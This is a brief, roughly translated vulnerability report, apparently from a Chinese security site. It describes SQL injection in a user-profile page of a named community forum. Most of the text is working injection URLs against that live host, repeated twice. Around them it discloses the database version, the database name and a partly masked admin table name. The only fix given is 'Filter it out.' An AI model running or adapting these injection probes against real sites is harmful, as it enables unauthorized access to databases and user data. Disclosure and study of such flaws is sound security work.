The SQL injection vulnerability exists in online community forums. In severe cases, you can obtain host and database information. You may wish to fix the problem as Administrator speed to avoid host security threats.
Detailed description:
Http://club.she.tom.com/users/userinfo.php? Username = qiaofeiyu 'and '1' = '1
Http://club.she.tom.com/users/userinfo.php? Username = qiaofeiyu 'or '1' = '2
Http://club.she.tom.com/users/userinfo.php? Username = qiaofeiyu 'order by 1 -- +-
You can perform a secondary injection test.
Proof of vulnerability: www.2cto.com
Http://club.she.tom.com/users/userinfo.php? Username = qiaofeiyu 'and '1' = '1
Http://club.she.tom.com/users/userinfo.php? Username = qiaofeiyu 'or '1' = '2
Http://club.she.tom.com/users/userinfo.php? Username = qiaofeiyu 'order by 1 -- +-
You can perform a secondary injection test.
VERSION:
MYSQL 5.X
DATABASE:
Bbsadmin
Related tables:
Admin_usxxxxxxx
Solution:
Filter it out.
Lone fox prodigal son